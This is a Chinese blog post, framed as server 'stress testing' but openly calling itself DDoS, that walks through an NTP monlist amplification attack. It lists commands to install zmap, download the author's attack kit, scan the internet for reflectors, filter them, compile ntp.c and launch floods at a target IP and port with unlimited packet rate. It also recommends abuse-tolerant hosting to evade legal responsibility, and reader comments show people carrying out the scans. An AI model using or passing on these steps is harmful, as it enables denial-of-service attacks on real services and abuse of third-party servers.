搜索

就是$ddos$啦,别干违法!
请使用抗投诉服务器,切勿使用国内服务器,本人不承担任何法律责任!


系统环境为CentOS7 先sudo su 给权限

首先yum update后安装依赖

yum install epel-release -y
yum install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c zmap screen -y

然后下载压缩包

wget blog.myyrh.com/hh/D.zip

若提示没$wget$

yum install -y wget

然后默认在/root 下解压

unzip D.zip

打开一个screen并使用zmap进行扫描

screen zmap -p 123 -M udp --probe-args=file:/root/ntp_123_monlist.pkt -o monlist_fingerprint.txt

如果提示错误需要指定网卡,加一个-i 网卡名称,例如

screen zmap -i p2p1 -p 123 -M udp --probe-args=file:/root/ntp_123_monlist.pkt -o monlist_fingerprint.txt

然后就是漫长的等待,测试服务器使用500M带宽,扫描全网花了6个小时

扫出结果后,我们需要检查下列表内的IP哪些可以使用反射

给压缩包内的ntpchecker 777权限

chmod 777 ntpchecker

进行检查

./ntpchecker monlist_fingerprint.txt step1.txt 1 0 1

这个步骤应该10分钟就OK了,具体取决于机器性能和网络速率,怕掉线的话可以开个screen保持

检查完成后,进行格式化

awk '$2>419{print $1}' step1.txt | sort -n | uniq | sort -R > ntpamp.txt

这样我们就得到了一份可以用来进行使用的NTP列表了

压缩包内已经有了攻击程序,可以直接使用

编译压缩包内的攻击程序

gcc -lpthread ntp.c -lpcap -o ntp

到此就可以了

使用命令举例

./ntp 127.0.0.1 80 ntpamp.txt 1000 -1 100
127.0.0.1=目标IP
80=攻击端口
ntpamp.txt=过滤后的放大列表
1500=线程
-1=pps限制,-1表示无限制
100=攻击时间

请合理利用,请勿适用于非法用途

版权属于:YuRuiH
作品采用:本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可。
1
查看目录

目录

来自 《【干货】如何利用大带宽服务器进行测压》
评论

本篇文章评论功能已关闭
  1. 评论头像
    2022-10-17 回复

    ntpamp.txt这个文件的意思是只能 测压这里面的ip是吗?

  2. 评论头像
    2022-01-22 回复

    下载不了压缩包了

    1. 评论头像
      @进 YuRuiH 作者
      2022-01-22 回复

      可以呀

      1. 评论头像
        @YuRuiH
        2022-01-23 回复

        为啥扫描一晚上了还在扫,要扫多少流量大概

        1. 评论头像
          @进 YuRuiH 作者
          2022-01-24 回复

          我都是几十分钟,你跑命令别关ssh

          1. 评论头像
            @YuRuiH
            2022-01-31 回复

            我迷茫了,大哥,我扫几万了,能用的只有三十来个,还在扫

      2. 评论头像
        @YuRuiH
        2022-01-22 回复

        好了

YuRuiH

不同的时间,不同的地点,不同的人群,相同的只有你和我